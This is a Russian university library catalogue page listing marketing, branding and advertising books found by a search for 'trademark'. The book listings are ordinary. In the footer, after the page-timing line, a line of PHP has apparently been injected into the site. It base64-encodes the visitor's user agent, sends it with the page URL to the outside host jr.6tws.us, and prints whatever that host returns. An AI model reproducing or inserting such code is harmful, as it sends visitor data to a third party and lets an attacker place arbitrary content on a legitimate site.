Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

53 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Торговая марка")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 43
1. 
Дойль, Питер. Маркетинг-менеджмент и стратегии [Текст] / П. Дойль; Пер. с англ. С. Жильцова; Под общ. ред. Ю. Н. Каптуревского, 2003. - 538 с.
Держатели документа (Информация об экземплярах) 

Учебник по менеджменту и маркетингу Питера Дойля является наиболее полным и удобным для изучения из всех ранее издававшихся. Неслучайно первое его издание удостоилось звания "Лучший учебник по менеджменту в Европе". Авто рассматривает все основные аспекты современного управления и маркетинга: <стратегическое> <рыночное планирование>, <брендинг>, <инновации>, <ценообразование>, <антикризисное управление>, уделяя большое внимание актуальности публикуемого материала. Питер Дойль, не навязывая своих взглядов, позволяет читателю делать выбор и размышлять, самому находить пути решения поставленных задач и проблем.

2. 
Васильева, Маргарита. Бренд: сила личности [Текст] / М. Васильева, А. Надеин, 2003. - 202 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
3. 
Кеворков, Владимир Владимирович. Слоган [Текст] : Практ. рук. / В. В. Кеворков, 2003. - 132 с.
Держатели документа (Информация об экземплярах) 
4. 
Рекламная коммуникация [Текст] : Учеб. пособие для вузов по специальности 350700 "Реклама" / В. Л. Полукаров, Е. Л. Головлева, Е. В. Добренькова, Е. М. Ефимова; Под общ. ред. В. Л. Полукарова, 2002. - 343 с.
Держатели документа (Информация об экземплярах) 
5. 
Головко, Бориэль Николаевич. Брэндинг: теория и практика [Текст] : Учеб. пособие для вузов по специальности 350700 "Реклама" / Б. Н. Головко, 2003. - 321, [3] с.
Держатели документа (Информация об экземплярах) 

Это первое научно-теоретическое и практическое учебное пособие, соответствующее Государственному образовательному стандарту по специальности 350700 "Реклама".

Для студентов и аспирантов факультетов и отделений рекламы, художественно-технического оформления печатной продукции, для университетов, медиа-центров и отделений компьютерной графики, для факультетов рекламы и менеджмента, экономики и индустриальных искусств, для PR-агентств, рекламных компаний, офис-менеджеров, медиаселлеров, имиджмейкеров, департаментов маркетинга.

6. 
Феофанов, Олег Александрович. Реклама: новые технологии в России [Текст] : Учеб. пособие для подгот. профессионалов в сфере рекламы / О. А. Феофанов, 2003. - 376, [1] с.
Держатели документа (Информация об экземплярах) 

Книга - результат более чем тридцатилетней работы автора в сфере рекламы, чтения лекций в МГИМО,МГУ, Институте кинематографии и других академиях и институтах, проведения бесчисленных семинаров в самых разных городах страны, а также непосредственного участия в практической рекламной деятельности - консультировании различных рекламных, финансовых, коммерческих, политических и общественных организаций. Рассуждения и наблюдения иллюстрируются многочисленными примерами рекламной деятельности в нашей стране.

7. 
ЛеПла, Ф. Джозеф. Интегрированный брендинг [Текст] / Ф. Д. ЛеПла, Л. М. Паркер; Под ред. А. Романченко; Пер. с англ. С. Г. Божук, 2003. - 318 с.
Держатели документа (Информация об экземплярах) 
8. 
Аакер, Дэвид. Бренд-лидерство: новая концепция брендинга [Текст] / Д. Аакер, Э. Йохимштайлер; Пер. с англ.: Н. В. Кияченко и др., 2003. - 374 с.
Держатели документа (Информация об экземплярах) 
9. 
Иванов, Михаил С. Руководство по маркетингу консалтинговых услуг [Текст] / М. С. Иванов, М. В. Фербер, 2003. - 139 с.
Держатели документа (Информация об экземплярах) 
10. 
Мокшанцев, Рудольф Иванович. Психология рекламы [Текст] : Учеб. пособие для вузов по специальности "Менеджмент" / Р. И. Мокшанцев, 2002. - 228 [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Батра, Раджив. Рекламный менеджмент [Текст] : Пер. с англ. / Р. Батра, Д. Д. Майерс, Д. А. Аакер, 2001. - 780 с.
Держатели документа (Информация об экземплярах) 
12. 
Дойль, Питер. Менеджмент: стратегия и тактика [Текст] / П. Дойль; Т. Карасевич, Ю. Н. Каптуревский, 1999. - 559 с.
Держатели документа (Информация об экземплярах) 
13. 
Уэллс, Уильям. Реклама: теория и практика [Текст] : учебное пособие / У. Уэллс, Д. Бернет, С. Мориарти; М. Артюх, 1999. - 735 с.
Держатели документа (Информация об экземплярах) 
14. 
Батра, Раджив. Рекламный менеджмент [Текст] : Пер. с англ. / Р. Батра, Д. Дж. Майерс, Д. А. Аакер, 1999. - 780 с.
15. 
Чармэссон, Генри. Торговая марка: как создать имя, которое принесет миллионы [Текст] / Г. Чармэссон; Л. Корпан, 1999. - 222 с.
16. 
Феофанов, Олег Александрович. Реклама: новые технологии в России [Текст] : Учеб. пособие для подгот. профессионалов в сфере рекламы / О. А. Феофанов, 2000. - 376, [1] с.
17. 
Стюарт, Билл. Упаковка как инструмент эффективного маркетинга [Текст] / Б. Стюарт; Пер. с англ. В. В. Грачева, 1999. - 145 с.
Держатели документа (Информация об экземплярах) 
18. 
Чармэссон, Генри. Торговая марка: как создать имя, которое принесет миллионы [Текст] / Г. Чармэссон; Л. Корпан, 2000. - 222 с.
Держатели документа (Информация об экземплярах) 
19. 
Уэллс, Уильям. Реклама: принципы и практика [Текст] / У. Уэллс, Д. Бернет, С. Мориарти; М. Артюх, И. В. Крылов, А. В. Ульяновский, 2001. - 735 с.
Ключевые слова 
Учебник и пособие -- Рекламное агентство -- ТОРГОВАЯ МАРКА -- Планирование -- Сми -- Средства массовой информации -- Связи с общественностью -- КАМПАНИЯ -- Бизнес-реклама -- Международная -- РЕКЛАМНАЯ -- ЭТИКА -- ПРАВОВОЕ -- РЕГУЛИРОВАНИЕ -- КОНТРРЕКЛАМА -- РЫНОК -- СТРАТЕГИЯ -- ПСИХОЛОГИЯ -- ИНФОРМАЦИЯ -- ПЕЧАТНАЯ -- ТЕЛЕВИЗИОННАЯ -- РАДИОРЕКЛАМА -- ПРЯМОЙ -- МАРКЕТИНГ -- ВНЕШНЯЯ -- ТРАНЗИТНАЯ -- ПРОДВИЖЕНИЕ -- ТОВАР -- КОММУНИКАЦИЯ -- ОЦЕНОЧНОЕ ИССЛЕДОВАНИЕ
20. 
Рэпп, Стэн. Новый максимаркетинг [Текст] / С. Рэпп, Л. Коллинз; Т. А. Лащенко, 1997. - 536 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3221 - 04.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.47 с.12 запросов, 0.68c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;